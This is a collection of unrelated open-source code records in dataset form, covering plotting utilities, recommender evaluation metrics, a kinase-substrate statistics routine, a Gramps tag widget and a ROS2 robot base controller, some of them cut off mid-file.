plot_type == 'axhline':\n _axhline(plot_data, plot_args)\n elif plot_type == 'axvline':\n _axvline(plot_data, plot_args)\n elif plot_type == 'text':\n _text(plot_data, plot_args)\n else:\n fatal(Exception(f'Invalid plot_type: `{plot_type}`'))\n\n if not plot_something:\n return\n\n if title is not None:\n plt.title(title)\n fig = pylab.gcf()\n if fig.canvas.manager is not None:\n fig.canvas.manager.set_window_title(title)\n if x_label is not None:\n if type(x_label) is tuple:\n plt.xlabel(*x_label[:-1], **x_label[-1])\n else:\n plt.xlabel(x_label)\n if y_label is not None:\n if type(y_label) is tuple:\n plt.ylabel(*y_label[:-1], **y_label[-1])\n else:\n plt.ylabel(y_label)\n if x_ticks is not None:\n plt.xticks(*x_ticks[:-1], **x_ticks[-1])\n if y_ticks is not None:\n plt.yticks(*y_ticks[:-1], **y_ticks[-1])\n if tight_layout or (type(legend_outside) is bool and legend_outside) or type(legend_outside) is float:\n warnings.filterwarnings(\"error\")\n try:\n if not legend_outside:\n plt.tight_layout()\n else:\n width = FIGURE_EXTRA_WIDTH_RATIO_FOR_LEGEND\n if type(legend_outside) is float:\n width += legend_outside\n plt.tight_layout(rect=[0, 0, width, 1])\n except Warning as e:\n warn(f'Tight Layout Issue: title: {title} | x_label: {x_label} | y_label: {y_label} | legend: {legend} | '\n f'legend_outside: {legend_outside} | tight_layout: {tight_layout} | file_label: {file_label} | '\n f'subdir: {subdir} | file_prefix: {file_prefix}')\n warn(e)\n warnings.resetwarnings()\n\n if (type(legend_outside) is bool and legend_outside) or type(legend_outside) is float:\n plt.legend(loc='center left', bbox_to_anchor=(FIGURE_LEGEND_X_ANCHOR, FIGURE_LEGEND_Y_ANCHOR))\n elif type(legend) is str:\n plt.legend(legend)\n elif type(legend) is dict:\n plt.legend(**legend)\n elif type(legend) is bool and legend:\n plt.legend()\n\n if (type(resize) is bool and resize) or type(resize) is tuple:\n if type(resize) is tuple:\n resizeFigure(resize[0], resize[1])\n else:\n resizeFigure()\n\n if mode in (PlotMode.BLOCKING_SHOW, PlotMode.NON_BLOCKING_SHOW):\n if mode == PlotMode.BLOCKING_SHOW:\n plt.show(block=True)\n else:\n plt.show(block=False)\n VarsHolder._had_a_non_blocking = True\n clearCurrentFigure() # to clean up, when show not blocking or saving to file\n plt.figure(dpi=FIGURE_DPI)\n else:\n createFolder(SAVED_PLOTS_PATH)\n if type(file_prefix) is bool:\n if file_prefix:\n file_prefix = 'plot'\n else:\n file_prefix = ''\n if not file_postfix:\n 
file_counter_postfix = file_datetime_postfix = False\n if file_label is None:\n file_label = re.sub(r'\\W+', '', title.replace(' ', '_').lower())\n filepath = getNextPlotFilepath(prefix=file_prefix, label=file_label, plot_subdir=subdir,\n add_run_id=add_rid_subdir, counter_postfix=file_counter_postfix,\n datetime_postfix=file_datetime_postfix)\n\n runWithExpRetry(f'SavePlot-{file_label}', plt.savefig, [filepath], dict(bbox_inches='tight', dpi=FIGURE_DPI),\n 3, raise_it=False)\n clearCurrentFigure() # to clean up, when show not blocking or saving to file\n plt.figure(dpi=FIGURE_DPI)\n maybeUnlock(file_label, lock)\n\n\ndef showOrSavePymooPlot(the_plot: Plot, label: str, subsubdir: Optional[str] = None, prefix: str = '') -> None:\n try:\n resizeFigure()\n plot_subdir = 'nas'\n if subsubdir is not None:\n pathJoin(plot_subdir, subsubdir)\n if DEFAULT_PLOT_MODE == PlotMode.SAVE_TO_FILE:\n filepath = getNextPlotFilepath(prefix=prefix, label=label, plot_subdir=plot_subdir,\n add_run_id=True, counter_postfix=False,\n datetime_postfix=False)\n the_plot.save(filepath, dpi=FIGURE_DPI)\n elif DEFAULT_PLOT_MODE in (PlotMode.BLOCKING_SHOW, PlotMode.NON_BLOCKING_SHOW):\n the_plot.show()\n except:\n del the_plot\n\n\ndef getCMap(cmap_name: str) -> object:\n return matplotlib.colormaps[cmap_name]\n\n\nmatplotlib.rcParams['figure.dpi'] = FIGURE_DPI\n","repo_name":"thiagofigcosta/stock-pred-v3","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":16684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27055225650","text":"import pandas as pd\r\ndata={\r\n \r\n 'A':[1,0,1,1],\r\n 'B':[0,2,5,0],\r\n 'C':[4,0,4,4],\r\n 'D':[1,0,1,1]\r\n}\r\ndf=pd.DataFrame(data=data)\r\n#默认保留第一次出现的重复项\r\ndata = pd.DataFrame()\r\ndata['a'] = df['A']\r\nprint(data)","repo_name":"GS233/MyNLPCoding","sub_path":"1.京东爬虫/00.test.py","file_name":"00.test.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9937074542","text":"import math\nfrom collections import OrderedDict\nimport numpy as np\n\nfrom utils.stats import Statistics\nfrom .. 
import HOLDOUT_METRICS\n# from evaluation.backend import HOLDOUT_METRICS\n\n# HOLDOUT_METRICS = ['Prec', 'Recall', 'NDCG']\n\ndef compute_holdout_metrics_py(pred, target, ks):\n score_cumulator = OrderedDict()\n for metric in HOLDOUT_METRICS:\n score_cumulator[metric] = {k: Statistics('%s@%d' % (metric, k)) for k in ks}\n \n hits = []\n for idx, u in enumerate(target):\n pred_u = pred[idx]\n target_u = target[u]\n num_target_items = len(target_u)\n for k in ks:\n pred_k = pred_u[:k]\n hits_k = [(i + 1, item) for i, item in enumerate(pred_k) if item in target_u]\n num_hits = len(hits_k)\n\n idcg_k = 0.0\n for i in range(1, min(num_target_items, k) + 1):\n idcg_k += 1 / math.log(i + 1, 2)\n\n dcg_k = 0.0\n for idx, item in hits_k:\n dcg_k += 1 / math.log(idx + 1, 2)\n \n prec_k = num_hits / k\n recall_k = num_hits / num_target_items\n ndcg_k = dcg_k / idcg_k\n\n score_cumulator['Prec'][k].update(prec_k)\n score_cumulator['Recall'][k].update(recall_k)\n score_cumulator['NDCG'][k].update(ndcg_k)\n \n hits.append(len(hits_k))\n return score_cumulator\n\n# class HoldoutEvaluator:\n# def __init__(self, top_k, eval_pos, eval_target, eval_neg_candidates=None):\n# self.top_k = top_k\n# self.max_k = max(top_k)\n# self.eval_pos = eval_pos\n# self.eval_target = eval_target\n# self.eval_neg_candidates = eval_neg_candidates\n\n# def init_score_cumulator(self):\n# score_cumulator = OrderedDict()\n# for metric in ['Prec', 'Recall', 'NDCG']:\n# score_cumulator[metric] = {k: Statistics('%s@%d' % (metric, k)) for k in self.top_k}\n# return score_cumulator\n\n# def compute_metrics(self, topk, target, score_cumulator=None):\n# if score_cumulator is None:\n# score_cumulator = self.init_score_cumulator()\n\n# hits = []\n# for idx, u in enumerate(target):\n# pred_u = topk[idx]\n# target_u = target[u]\n# num_target_items = len(target_u)\n# for k in self.top_k:\n# pred_k = pred_u[:k]\n# hits_k = [(i + 1, item) for i, item in enumerate(pred_k) if item in target_u]\n# num_hits = len(hits_k)\n\n# idcg_k = 0.0\n# for i in range(1, min(num_target_items, k) + 1):\n# idcg_k += 1 / math.log(i + 1, 2)\n\n# dcg_k = 0.0\n# for idx, item in hits_k:\n# dcg_k += 1 / math.log(idx + 1, 2)\n\n# if num_hits:\n# pass\n \n# prec_k = num_hits / k\n# recall_k = num_hits / min(num_target_items, k)\n# ndcg_k = dcg_k / idcg_k\n\n# score_cumulator['Prec'][k].update(prec_k)\n# score_cumulator['Recall'][k].update(recall_k)\n# score_cumulator['NDCG'][k].update(ndcg_k)\n \n# hits.append(len(hits_k))\n# return score_cumulator","repo_name":"yoongi0428/RecSys_PyTorch","sub_path":"evaluation/backend/python/holdout.py","file_name":"holdout.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"76"} +{"seq_id":"73274391926","text":"def userInput(ks_db, graphics, df, min_sub):\n\n import io\n from io import StringIO\n import pandas as pd\n import scipy.stats as st\n import numpy as np\n\n if graphics == \"yes\":\n import matplotlib as mpl\n mpl.use('Agg')\n import matplotlib.pyplot as plt\n from mpl_toolkits.axes_grid1 import axes_size\n from mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\n from mpl_toolkits.axes_grid1.axes_size import AxesY, Fraction\n from mpl_toolkits.axes_grid1.colorbar import colorbar\n import seaborn as sns\n\n # Function that returns the Kolmogorov-Smirnov test statistic along with the p-value.\n # -log10 of p-value is also calculated for the barplot.\n def ksTest(substrates, non_substrates):\n result = st.ks_2samp(substrates, 
non_substrates)\n ks_stat = result[0]\n pval = result[1]\n log_pval = np.log10(1/pval)\n return ks_stat, pval, log_pval\n\n # Convert JSON-string datatset back into a DF.\n df = pd.read_json(df, orient=\"split\")\n \n # User data is passed from the server and parsed as appropriate.\n user_file = df.values.tolist()\n header = df.columns.values.tolist()\n col_length=len(header)\n array=[]\n for line in user_file:\n if line == \"\":\n continue\n else: \n if \"\" not in line:\n array.append(line)\n\n nonsub_dic={}\n kinase_dic={}\n dic={}\n pval_map=[]\n heatmap_array=[]\n kolsmir_info=[]\n ks_links=[]\n ks_info=[]\n kolsmir_col=[\"Kinase\", \"Sub.Count\"]\n ks_col=[\"Kinase\", \"Site\", \"Site.Seq(+/- 7AA)\", \"Source\"]\n heatmap_col=[\"Kinase\"]\n # Columns 1 and onwards represent samples (e.g. cell lines).\n # For the current column (sample) a set of operations is performed. \n for col in range(1, col_length):\n # Reset the values in each dictionary for a new column.\n for key in dic:\n dic[key] = []\n for kin in kinase_dic:\n kinase_dic[kin] = []\n # Column names for relevant dataframes are created here dynamically.\n # curr_col is current sample/column name.\n curr_col=header[col]\n kolsmir_col.append(\"mnlog2(FC).\" + curr_col)\n kolsmir_col.append(\"(+/-)KS.\" + curr_col)\n kolsmir_col.append(\"pVal.\" + curr_col)\n kolsmir_col.append(\"(+/-)-log10(pVal).\" + curr_col)\n ks_col.append(\"log2(FC).\" + curr_col)\n heatmap_col.append(curr_col)\n\n data=[]\n # Multiple phosphosites separated by a colon are split here.\n # This ensures each phosphosite substrate and the log2(FC) value starts with a new line.\n # This is ran for each sample in turn. \n for n in range (0, len(array)):\n site=array[n][0].upper()\n fc=array[n][col]\n site=site.split(\";\")\n for s in site:\n if s == '':\n continue\n else:\n data.append([s, float(fc)])\n\n # Mapping of phosphosite substrate keys to their (often multiple) log2(FCs) is achieved here.\n for entry in data:\n site=entry[0]\n fc=entry[1]\n if site not in dic:\n dic[site]=[fc]\n else:\n dic[site].append(fc)\n\n # If the same phosphosite has been detected more than once, its mean log2(FC) is calculated.\n # Final dictionary contains unique phosphosites and individual log2(FC) values, averaged where appropriate.\n for key in dic:\n length=len(dic[key])\n mean_fc=sum(dic[key])/length\n dic[key] = float(mean_fc)\n\n # Each phosphosite in the dictionary is scanned against the K-S db. \n # If a match is found, relevant information for that phosphosite is retained.\n # Scanning is only done for the first column.\n if col == 1:\n for x in dic:\n for y in ks_db:\n if x == y[0]:\n # ks_links will be used to assign the current sample's log2(FCs) to each kinase later on.\n ks_links.append([y[1], y[0], y[2], y[3], dic[x]])\n # ks_info will contain kinase-substrate relationship info for each sample.\n ks_info.append([y[1], y[0], y[2], y[3], dic[x]])\n # Once the first column is passed, new log2(FCs) are removed and/or appended to the original arrays for each sample.\n elif col > 1:\n for s in ks_links:\n s.remove(s[-1])\n s.append(dic[s[1]])\n for k in ks_info:\n k.append(dic[k[1]])\n\n # List converted into a dataframe for further data manipulation. 
\n ks_links_df = pd.DataFrame(ks_links, columns = [\"Kinase\", \"Site\", \"Site.Seq(+/- 7AA)\", \"Source\", \"log2(FC)\"])\n\n # A dictionary containing unique kinases and substrate log2(FCs) is created.\n # If the same kinase was identified for multiple substrates, multiple log2(FCs) are appended to the dictionary values.\n for match in ks_links:\n kinase=match[0]\n log2fc=match[4]\n if kinase not in kinase_dic:\n kinase_dic[kinase]=[log2fc]\n else:\n kinase_dic[kinase].append(log2fc)\n\n # The dictionary is used to calculate the number of substrates identified for each unique kinase.\n # It also calculates the mean log2(FC) across each kinase's substrates.\n # The algorithm computes the (+/-)KS statistic, p-value and -log10(p-value) using substrate and non-substrate log2(FC) values.\n index=-1\n condition=-1\n for kinase in kinase_dic:\n index+=1\n nonsub_fc=[]\n sub_num=len(kinase_dic[kinase])\n kin_fc_mean=sum(kinase_dic[kinase]) / float(sub_num)\n if col == 1:\n # Substrate names for a given kinase are extracted into a flat list.\n # These will be used to identify all non-substrates conditionally.\n sub_df = ks_links_df.loc[ks_links_df['Kinase'] == kinase]\n sub_names = sub_df['Site'].tolist()\n # Non-substrates are located within the ks_links dataframe.\n # For faster performance, these are assigned to a new dictionary to be re-used for columns 2 onwards.\n non_sub_df=ks_links_df.loc[~ks_links_df['Site'].isin(sub_names)]\n non_sub_df=non_sub_df.drop_duplicates(subset='Site')\n nonsub_names = non_sub_df['Site'].tolist()\n nonsub_dic[kinase] = nonsub_names\n # Substrate and non-substrate log2(FC) values.\n sub_fc = kinase_dic[kinase]\n non_sub_fc = non_sub_df['log2(FC)'].tolist()\n #KS-test statistic and p-value for each kinase are calculated here.\n ks_stat, pval, log_pval = ksTest(sub_fc, non_sub_fc)\n # -log10(p-val) and KS is signed based on the mean log2(FC) of the kinase.\n if kin_fc_mean < 0:\n log_pval = -log_pval\n ks_stat = -ks_stat\n # Kolmogorov-Smirnov stats are appended to a new list here.\n kolsmir_info.append([kinase, sub_num, kin_fc_mean, ks_stat, pval, log_pval])\n\n elif col > 1:\n # Non-substrate log2(FCs) are identified for each kinase.\n sub_fc = kinase_dic[kinase]\n non_subs = nonsub_dic[kinase]\n for n in non_subs:\n nonsub_fc.append(dic[n])\n # KS-test function applied here.\n ks_stat, pval, log_pval = ksTest(sub_fc, nonsub_fc)\n # -log10(p-val) and KS is signed based on the mean log2(FC) of the kinase.\n if kin_fc_mean < 0:\n log_pval = -log_pval\n ks_stat = -ks_stat\n # If the program has gone past the first column, each statistic is appended in a repeating manner to the original array.\n kolsmir_info[index].append(kin_fc_mean)\n kolsmir_info[index].append(ks_stat)\n kolsmir_info[index].append(pval)\n kolsmir_info[index].append(log_pval)\n\n if sub_num >= min_sub:\n condition+=1\n if col == 1:\n # Array used for heatmap generation. \n heatmap_array.append([kinase, log_pval])\n # An array of p-values for each kinase across all samples. 
Used for heatmap annotation.\n pval_map.append([pval])\n elif col > 1:\n heatmap_array[condition].append(log_pval)\n pval_map[condition].append(pval)\n\n # p-values for the heatmap annotation are extracted from a nested list into a flat list.\n pvalues=[]\n for entry in pval_map:\n for pval in entry:\n pvalues.append(pval)\n\n # Statistic and KS-links dataframes are generated.\n kolsmir_df = pd.DataFrame(kolsmir_info, columns=kolsmir_col)\n ksinfo_df = pd.DataFrame(ks_info, columns=ks_col)\n # Heatmap df for the heatmap generation.\n heatmap_df = pd.DataFrame(heatmap_array, columns=heatmap_col)\n heatmap_df=heatmap_df.set_index(\"Kinase\")\n\n # Heatmap only generated if the user chose to produce graphics during file upload.\n if graphics == \"no\":\n svg_fig = \"Heatmap was not generated for this analysis.\"\n elif graphics == \"yes\":\n # Set the margins and bar height for a single category.\n topmargin = 0.1 #inches\n bottommargin = 0.1 #inches\n categorysize = 0.35 # inches\n # Number of kinases identified.\n n=len(heatmap_array)\n\n leftmargin = 0.1\n rightmargin = 0.1\n catsize = 0.5\n # Number of conditions (e.g. cell lines).\n m=len(heatmap_col)-1\n\n # Parameters for color bar.\n aspect = n\n pad_fraction = 0.7\n\n # Calculate a dynamic figure height based on the known values above.\n figheight = topmargin + bottommargin + (n+1)*categorysize\n\n # Calculate a dynamic figure width based on the known values above.\n figwidth = leftmargin + rightmargin + (m+1)*catsize\n\n fig, ax = plt.subplots(figsize=(figwidth, figheight))\n\n # Format the axes.\n ax.xaxis.set_ticks_position('top')\n plt.yticks(fontsize=6)\n plt.xticks(fontsize=6)\n\n # Plot the heatmap.\n ax = sns.heatmap(heatmap_df, cmap='coolwarm', annot=True, fmt=\".1f\", annot_kws={'size':5}, cbar=False, linewidths=0.3, linecolor='white')\n\n # Format the colour bar dynamically.\n ax_div = make_axes_locatable(ax)\n width = axes_size.AxesY(ax, aspect=1./aspect)\n pad = axes_size.Fraction(pad_fraction, width)\n cax = ax_div.append_axes('right', size = width, pad = pad)\n cb=plt.colorbar(ax.get_children()[0], cax = cax, orientation = 'vertical')\n cax.yaxis.set_ticks_position('right')\n cb.ax.tick_params(labelsize=6)\n cb.set_label('(+/-) -log10(p-value)', fontsize=6, labelpad=7)\n cb.outline.set_visible(False)\n\n #Remove y axis label.\n ax.yaxis.set_label_text(\"\")\n\n # Rotate the axis labels.\n for item in ax.get_yticklabels():\n item.set_rotation(0)\n\n for item in ax.get_xticklabels():\n item.set_rotation(90)\n\n # Annotate statistically significant scores with asterisks.\n # * for p < 0.05 and ** for p < 0.01.\n counter=-1\n for text in ax.texts:\n counter+=1\n if pvalues[counter] < 0.05 and pvalues[counter] >= 0.01:\n text.set_weight('bold')\n text.set_text(text.get_text() + \"*\")\n elif pvalues[counter] < 0.01:\n text.set_weight('bold')\n text.set_text(text.get_text() + \"**\")\n\n # Create a StringIO object and use it to write SVG figure data to string buffer.\n fig_file = StringIO()\n fig.savefig(fig_file, format='svg', bbox_inches=\"tight\")\n # Seek beginning of the figure file.\n fig_file.seek(0)\n # Retrieve figure contents as a string.\n svg_fig = ' 0.5 else 0 for prob in np.ravel(predictions)\n]\n\nprint(f'Accuracy on test set: {accuracy_score(Y_test, prediction_classes):.2f}')\n\n#save results\nnp.savetxt('results.csv', prediction_classes, 
delimiter=',')\nmodel.save(\"my_model\")\n\n\n\n\n","repo_name":"akselhm/IntelligentSystems2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14044376290","text":"from gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\nfrom gi.repository import PangoCairo\n\n#-------------------------------------------------------------------------\n#\n# SegmentMap class\n#\n#-------------------------------------------------------------------------\n\nclass TagList(Gtk.DrawingArea):\n \"\"\"\n A graphical list of tags.\n \"\"\"\n\n __gsignals__ = {'clicked': (GObject.SignalFlags.RUN_FIRST, None, (int,))}\n\n def __init__(self, tag_list=None):\n Gtk.DrawingArea.__init__(self)\n\n self.add_events(Gdk.EventMask.POINTER_MOTION_MASK |\n Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK)\n self.connect('motion-notify-event', self.on_pointer_motion)\n self.connect('button-press-event', self.on_button_press)\n\n self.__active = -1\n self.__rects = []\n if tag_list is None:\n self.tag_list = []\n else:\n self.tag_list = tag_list\n\n def set_tags(self, tag_list):\n \"\"\"\n Set the tags to display.\n @param tag_list: A list of (tag name, color) tuples.\n @type tag_list: list\n \"\"\"\n self.tag_list = tag_list\n\n def do_draw(self, cr):\n \"\"\"\n A custom draw method for this widget.\n @param cr: A cairo context.\n @type cr: cairo.Context\n \"\"\"\n if (len(self.tag_list)) == 0:\n return\n\n allocation = self.get_allocation()\n context = self.get_style_context()\n fg_color = context.get_color(context.get_state())\n\n padding = 2\n size = 10\n\n cr.set_line_width(1)\n self.__rects = []\n for i, tag in enumerate(self.tag_list):\n\n cr.rectangle(i * (padding + size),\n padding,\n size,\n size)\n self.__rects.append((i * (padding + size),\n padding,\n size,\n size))\n\n color = Gdk.RGBA()\n color.parse(tag[1])\n cr.set_source_rgba(color.red, color.green, color.blue, 1)\n cr.fill()\n\n self.set_size_request((size + padding) * (i + 1) + padding, -1)\n\n def on_pointer_motion(self, _dummy, event):\n \"\"\"\n Called when the pointer is moved.\n @param _dummy: This widget. Unused.\n @type _dummy: Gtk.Widget\n @param event: An event.\n @type event: Gdk.Event\n \"\"\"\n if self.__rects is None:\n return False\n active = -1\n for i, rect in enumerate(self.__rects):\n if (event.x > rect[0] and event.x < rect[0] + rect[2] and\n event.y > rect[1] and event.y < rect[1] + rect[3]):\n active = i\n if self.__active != active:\n self.__active = active\n if active == -1:\n self.set_tooltip_text('')\n else:\n self.set_tooltip_text(self.tag_list[active][0])\n\n return False\n\n def on_button_press(self, _dummy, event):\n \"\"\"\n Called when a mouse button is clicked.\n @param _dummy: This widget. 
Unused.\n @type _dummy: Gtk.Widget\n @param event: An event.\n @type event: Gdk.Event\n \"\"\"\n if (event.button == 1 and\n event.type == Gdk.EventType.DOUBLE_BUTTON_PRESS and\n self.__active != -1):\n self.emit('clicked', self.__active)\n","repo_name":"gramps-project/addons-source","sub_path":"CombinedView/taglist.py","file_name":"taglist.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"76"} +{"seq_id":"44870347833","text":"#!/usr/bin/env python\n\nfrom functools import partial\nfrom math import pi as pi\nimport sys\nimport threading\nimport traceback\n\nfrom geometry_msgs.msg import Twist, TransformStamped\nfrom nav_msgs.msg import Odometry\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.time import Time\n\nfrom rcl_interfaces.msg import ParameterDescriptor\nimport tf2_ros\n\nfrom roboclaw_interfaces.msg import SpeedCommand, Stats\n\nfrom r2b2_base.base_functions import (\n calc_create_speed_cmd, calc_base_frame_velocity_from_encoder_diffs,\n calc_odometry_from_base_velocity\n)\nfrom r2b2_base.odometry_helpers import (\n yaw_from_odom_message\n)\n\n\nclass DEFAULTS:\n\n NODE_NAME = \"base_node\"\n\n # Subscribes\n CMD_VEL_TOPIC = \"cmd_vel\"\n ROBOCLAW_FRONT_STATS_TOPIC = \"roboclaw_front/stats\"\n ROBOCLAW_REAR_STATS_TOPIC = \"roboclaw_rear/stats\"\n\n # Publishes\n SPEED_CMD_TOPIC = \"roboclaw/speed_command\"\n ODOM_TOPIC = \"odom\"\n\n # Default Parameters\n LOOP_HZ = 20 # hertz\n WHEEL_DIST = 0.180 # meters\n WHEEL_RADIUS = 0.0325 # meters\n WHEEL_SLIP_FACTOR = 0.5 # Decimal % of angular motion lost to slip\n TICKS_PER_ROTATION = 48 * 34\n MAX_QPPS = 3700\n MAX_ACCEL = 20000\n MAX_X_LINEAR_VEL = 0.5 # meters/sec\n MAX_Z_ANGULAR_VEL = pi / 2 # radians/sec\n MAX_DRIVE_SECS = 1\n ODOM_FRAME_ID = \"odom\"\n PUBLISH_ODOM_TF = True\n BASE_FRAME_ID = \"base_link\"\n DEADMAN_SECS = 1\n LOG_LEVEL = \"info\"\n\n\nclass PARAMS:\n LOG_LEVEL = 'log_level'\n WHEEL_DIST = 'wheel_dist'\n WHEEL_RADIUS = 'wheel_radius'\n WHEEL_SLIP_FACTOR = 'wheel_slip_factor'\n TICKS_PER_ROTATION = 'ticks_per_rotation'\n MAX_DRIVE_SECS = 'max_drive_secs'\n DEADMAN_SECS = 'deadman_secs'\n MAX_QPPS = 'max_qpps'\n MAX_X_LIN_VEL = 'max_x_lin_vel'\n MAX_Z_ANG_VEL = 'max_z_ang_vel'\n MAX_ACCEL = 'max_accel'\n BASE_FRAME_ID = 'base_frame_id'\n WORLD_FRAME_ID = 'odom_frame_id'\n LOOP_HZ = 'loop_hz'\n PUBLISH_ODOM_TF = 'publish_odom_tf'\n SPEED_CMD_TOPIC = 'speed_command_topic'\n ODOM_TOPIC = 'odom_topic'\n CMD_VEL_TOPIC = 'cmd_vel_topic'\n ROBOCLAW_FRONT_STATS_TOPIC = 'roboclaw_front_stats_topic'\n ROBOCLAW_REAR_STATS_TOPIC = 'roboclaw_rear_stats_topic'\n\n\nclass BaseNode(Node):\n\n def __init__(self):\n super().__init__(DEFAULTS.NODE_NAME)\n\n self.declare_parameters(\n namespace='',\n parameters=[\n (PARAMS.LOG_LEVEL, DEFAULTS.LOG_LEVEL, ParameterDescriptor(description='Log verbosity, defaults to `info`')),\n (PARAMS.WHEEL_DIST, DEFAULTS.WHEEL_DIST, ParameterDescriptor(description='Width between the wheels in meters')),\n (PARAMS.WHEEL_RADIUS, DEFAULTS.WHEEL_RADIUS, ParameterDescriptor(description='Radius of the wheels in meters')),\n (PARAMS.WHEEL_SLIP_FACTOR, DEFAULTS.WHEEL_SLIP_FACTOR, ParameterDescriptor(description='Factor to compensate for wheel slip as a float >=0.0 <1.0')),\n (PARAMS.TICKS_PER_ROTATION, DEFAULTS.TICKS_PER_ROTATION, ParameterDescriptor(description='Wheel encoder ticks per rotation')),\n (PARAMS.MAX_DRIVE_SECS, DEFAULTS.MAX_DRIVE_SECS, ParameterDescriptor(description='Maximum seconds drive should run 
before stopping')),\n (PARAMS.DEADMAN_SECS, DEFAULTS.DEADMAN_SECS, ParameterDescriptor(description='Max time tolerated between cmd_vel messages before stopping')),\n (PARAMS.MAX_QPPS, DEFAULTS.MAX_QPPS, ParameterDescriptor(description='Max wheel rotation speed in QPPS')),\n (PARAMS.MAX_X_LIN_VEL, DEFAULTS.MAX_X_LINEAR_VEL, ParameterDescriptor(description='Max linear velocity in m/s')),\n (PARAMS.MAX_Z_ANG_VEL, DEFAULTS.MAX_Z_ANGULAR_VEL, ParameterDescriptor(description='Max angular velocity in rad/s')),\n (PARAMS.MAX_ACCEL, DEFAULTS.MAX_ACCEL, ParameterDescriptor(description='Max QPPS/sec of acceleration')),\n (PARAMS.BASE_FRAME_ID, DEFAULTS.BASE_FRAME_ID, ParameterDescriptor(description='Frame ID of the base')),\n (PARAMS.WORLD_FRAME_ID, DEFAULTS.ODOM_FRAME_ID, ParameterDescriptor(description='Frame ID of the world (e.g. `odom`')),\n (PARAMS.LOOP_HZ, DEFAULTS.LOOP_HZ, ParameterDescriptor(description='Frequency of the main logic loop')),\n (PARAMS.PUBLISH_ODOM_TF, DEFAULTS.PUBLISH_ODOM_TF, ParameterDescriptor(description='If true, publish the odom TF transform')),\n (PARAMS.SPEED_CMD_TOPIC, DEFAULTS.SPEED_CMD_TOPIC, ParameterDescriptor(description='Topic to publish for SpeedCommand messages to the Roboclaws')),\n (PARAMS.CMD_VEL_TOPIC, DEFAULTS.CMD_VEL_TOPIC, ParameterDescriptor(description='Topic to listen for Twist messages')),\n (PARAMS.ODOM_TOPIC, DEFAULTS.ODOM_TOPIC, ParameterDescriptor(description='Topic to publish for Odometry messages')),\n (PARAMS.ROBOCLAW_FRONT_STATS_TOPIC, DEFAULTS.ROBOCLAW_FRONT_STATS_TOPIC, ParameterDescriptor(description='Stats topic for front Roboclaw')),\n (PARAMS.ROBOCLAW_REAR_STATS_TOPIC, DEFAULTS.ROBOCLAW_REAR_STATS_TOPIC, ParameterDescriptor(description='Stats topic for rear Roboclaw'))\n ]\n )\n\n self._wheel_dist = self.get_parameter(PARAMS.WHEEL_DIST).value\n self._wheel_radius = self.get_parameter(PARAMS.WHEEL_RADIUS).value\n self._wheel_slip_factor = self.get_parameter(PARAMS.WHEEL_SLIP_FACTOR).value\n self._ticks_per_rotation = self.get_parameter(PARAMS.TICKS_PER_ROTATION).value\n self._max_drive_secs = self.get_parameter(PARAMS.MAX_DRIVE_SECS).value\n self._deadman_secs = self.get_parameter(PARAMS.DEADMAN_SECS).value\n self._max_qpps = self.get_parameter(PARAMS.MAX_QPPS).value\n self._max_x_lin_vel = self.get_parameter(PARAMS.MAX_X_LIN_VEL).value\n self._max_z_ang_vel = self.get_parameter(PARAMS.MAX_Z_ANG_VEL).value\n self._max_accel = self.get_parameter(PARAMS.MAX_ACCEL).value\n self._base_frame_id = self.get_parameter(PARAMS.BASE_FRAME_ID).value\n self._world_frame_id = self.get_parameter(PARAMS.WORLD_FRAME_ID).value\n self._publish_odom_tf = self.get_parameter(PARAMS.PUBLISH_ODOM_TF).value\n\n # Publishes\n self._speed_cmd_pub = self.create_publisher(\n msg_type=SpeedCommand,\n topic=self.get_parameter(PARAMS.SPEED_CMD_TOPIC).value,\n qos_profile=1\n )\n self._odom_pub = self.create_publisher(\n msg_type=Odometry,\n topic=self.get_parameter(PARAMS.ODOM_TOPIC).value,\n qos_profile=1\n )\n\n self._tf_broadcaster: tf2_ros.TransformBroadcaster = None\n if self._publish_odom_tf:\n self._tf_broadcaster = tf2_ros.TransformBroadcaster(self, qos=1)\n\n # Twist message Subscriber\n self.create_subscription(\n msg_type=Twist,\n topic=self.get_parameter(PARAMS.CMD_VEL_TOPIC).value,\n callback=self._cmd_vel_callback,\n qos_profile=1\n )\n\n # Roboclaw Stats message Subscriber\n self.create_subscription(\n msg_type=Stats,\n topic=self.get_parameter(PARAMS.ROBOCLAW_FRONT_STATS_TOPIC).value,\n callback=partial(self._roboclaw_stats_callback, 'front'),\n 
qos_profile=1\n )\n\n self.create_subscription(\n msg_type=Stats,\n topic=self.get_parameter(PARAMS.ROBOCLAW_REAR_STATS_TOPIC).value,\n callback=partial(self._roboclaw_stats_callback, 'rear'),\n qos_profile=1\n )\n\n # Main loop timer\n loop_secs = 1.0 / self.get_parameter(PARAMS.LOOP_HZ).value\n self.create_timer(loop_secs, self._base_loop_callback)\n\n # Init Twist command state\n self._x_linear_cmd = 0.0\n self._z_angular_cmd = 0.0\n\n # Last time we received a Twist message\n # If we don't get a message after deadman_secs, we stop the base\n self._last_cmd_vel_time: Time = self.get_clock().now()\n\n # Init Odometry state\n self._world_x = 0.0\n self._world_y = 0.0\n self._world_theta = 0.0\n self._last_odom_time: Time = None\n\n # Init Roboclaw stats state\n self._roboclaw_front_stats = None # type: Stats\n # self._roboclaw_rear_stats = None # type: Stats\n\n # Roboclaw encoder state\n self._m1_front_enc_prev = 0\n self._m2_front_enc_prev = 0\n # self._m1_rear_enc_prev = 0\n # self._m2_rear_enc_prev = 0\n\n self._stats_lock = threading.RLock() # To serialize access to the qpps stats\n self._cmd_vel_lock = threading.RLock() # To serialize access to x/z command variables\n\n # Set initial states\n if self._roboclaw_front_stats is not None:\n 